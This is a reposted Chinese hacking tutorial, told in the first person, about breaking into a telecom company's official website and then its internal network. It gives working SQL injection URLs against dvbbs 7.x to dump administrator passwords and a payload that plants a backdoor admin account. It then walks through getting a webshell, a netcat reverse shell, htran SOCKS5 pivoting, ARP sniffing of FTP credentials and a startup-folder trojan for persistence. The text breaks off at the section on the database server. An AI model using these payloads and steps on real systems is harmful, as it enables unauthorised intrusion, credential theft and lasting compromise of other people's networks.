电脑知识大全|电脑编程|电脑故障排除知识|操作系统|硬件|软件基础知识

高手是如何渗透一电信官方站点的

发布:admin2020-06-07 08:34分类网络知识

一、踩点:
http://xxx.online.xx.xx XX电信的站点,这个站是我一直都想拿下的,首页存在注入点,是sa 登陆,数据库是放另一外网的主机,那台主机禁止对外连接,但是可以上网,对外不开放端口。
http://xxx.online.xx.xx/bbs为其论谈,是access dvbbs7.0 sp2.

二、拿下aspshell
动网前台提权的方法我就不多说了,jinsdb给的工具,很快就提完前台。不抓图,继续. 得到前台后就是对拿后台。动网recycle.asp过滤不严,导致注入漏洞的存在,先说一下,漏洞不是我发现的,构造注入点如下:
http://xxx.online.xx.xx/bbs/recycle.asp?tablename=Dv_bbs1 union select 1,2,l_content,4,5,6 from dv_log where l_id0 union select 1,1,1,1,1,1 from dv_bbs1page=7

这里要注意的是,这个漏洞的前提是以前台管理员身份登陆,对access和mssql的dvbbs 7.x通杀,通过上面的构造,就可以暴出l_content的内容。这里还要说的是,最后面的page=7,通过上面的注入语句是暴出所有l_content的值,但是动网一个界面只能显示10多条,所以大家通过修改page的值来找l_content的内容,一般是在最后几个数字,这个page是回收站的页数,如果一共有130页,你一般从120开始,这样,通过121,122
,一直累注上去,直到找出password的明文,如果你懂点sql的话,当然也可以用来暴管理员的散列,只是变换一下注入语句而已,如:
http://xxx.online.xx.xx/bbs/recycle.asp?tablename=Dv_bbs1 union select 1,2,password,4,5,6 from dv_admin where password0 union select 1,1,1,1,1,1 from dv_bbs1page=7

利用上面的注射方式,可以暴出l_content的值,当然,如果你想暴dv_admin的话,只要构造一下注射语句就可以了。利用这种注册很快暴出前后台的账号和密码。

而对于sql方法更多,动网的其它文件也存在注入漏洞,如:先查看一下随便一个用户的资料,在最下面的奖惩处点一下,接着在操作理由里输入:
test ,没有对用户进行分值操作’,’127.0.0.1’,5) ;insert into dv_admin (username,[password],flag,adduser) values (’linzi123’,’7412b5da7be0cf42’,’1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37’,’linzi123’);--

这样在后台就加了一个linzi123的用户。进到后台后,sql的和access在备份的地方有些不同,偶给大家一个备份得shell的文件databack.htm.
打开他的源代码,找到语句
form method="post" action="http://目标主机/ADMIN_data.asp?action=BackupDataact=Backup"
把目标主机换成你已经进入后台的url就可以了,如http://www.cnbct.org/bbs/,接下来就和access的一样了,方法我就不多说了。
当然你也可以利用backup a shell,在国内几个商业黑客站点里有文章介绍。但是要注意的是要看权限,public权限就别想的了,至少我是无法做到。

三、代理的妙用
思路:
得到aspshell后,从传统的思维模式从发,先拿下这台机子,然后再向内网渗透。但是通过踩点后发现,主机的安全性做的还可以,没什么可以利用的第三方补丁。提权,以自身的水平来说,还无法这现。通过踩点可以知道,目录限的很死,activeX禁创控件,虽然主机有用Serv-U,但是改了端口和默认的账号和密码,所以根本无法提权。这时的想法是,先利用jet exp得到一个可执行的shell,然后,利用这个shell把主机做成一个socks5肉鸡,通过反弹,本机也进入其内网,再接着,就是扫描嗅探出主机Serv-U的账号和密码,然后quote site exec执行命令.
实践过程:
1.本地执行:jet 1 222.222.222.222 520
其中222.222.222.222为本机的IP,520为听的端口.生成一个db1.mdb,
2.把它上传到xxx.online.xx.xx,利用老兵的数据库操作功能打开这个db1.mdb,当然用海阳2006的数据库操作功能也可以,只要可以打开就可以。
3.本机事先用nc执行nc -vv -l -p 520,很快就得到一个反弹的shell,这里说一下,反弹的权限是当前权限,当你用system admin打开db.mdb,返回的会是systemshell,而在aspshell下打开则返回了aspshell的权限。
4.得到shell后,再上传一个htran,新板的htran有个sock5反弹的功能。执行如下:
本机: htran -s -listen 670 6700
xxx.online.xx.xx的aspshell上执行:htran -s -connect 我的IP 670
5.本机再用sockcap连接我的IP的6700端口,自己就变成了在他的内网中,这里要说的是guest权限是可以实现socks5的转发,大家不必去担心权限不够。 sockscap连接后,挂上扫描器,这个时候你扫的就会是那个内网所在的机子了,偶挂上后扫到内网几台弱口令的机子。

四、向主机进军
得到内网的机子的system权限后,开了他的TS,并用htran转到了公网(详情见我做的动画,光备里有)。有了一个GUI界面,也就方便自己的渗透,开始驱动,准备arpsniffer,因为主机有ftp,且是serv-u,所以我选择了嗅探它的21端口。对于嗅探的内容,网上有很多人做成了动画,大家去国内的黑客站点搜索一下就有资料。但是有一点要说一下,有些朋友在嗅探时老是显示can’n spoof等等出错,我建议大家去小榕的官方去下载原板的,个人觉得是驱动问题,大家换旧的驱动,不要用新的,个人经验。
几天后,再登上内网的机子,查了一下嗅的文件,看到了漂亮的ftp密码,不过不是system权限,好在目录是c:,有写的权限,向启动写了一个批处理志,内容就是运行偶上传的马儿,这里的马,偶放了一个没公布的马,免杀嘛!几天后就看到反弹了。反弹后,偶先把它做成了sockscap 肉鸡,这个时候做成服务,方便以后进来。用sockscap加个服务器,主要是方面以后的渗透,做完后,用sockscap添加3389登陆器,然后连接127.0.0.1就看到了界面,

五、向最难的SQL进军
查看conn.asp文件后,可知mssql服务器的IP是另一公网主机,不过,这台主机很让人难过,因为那台主机做了IP限制,只对xxx.online.xx.xx开放1433端口,其它的主机碰都碰不到它,另外采用软硬结合的防火墙,禁止程序对外连接,还好可以上网。

上一篇:网上银行基金交易存在安全隐患
下一篇:杀毒厂商为MSN用户杀毒详解安全守则
温馨提示如有转载或引用以上内容之必要,敬请将本文链接作为出处标注,谢谢合作!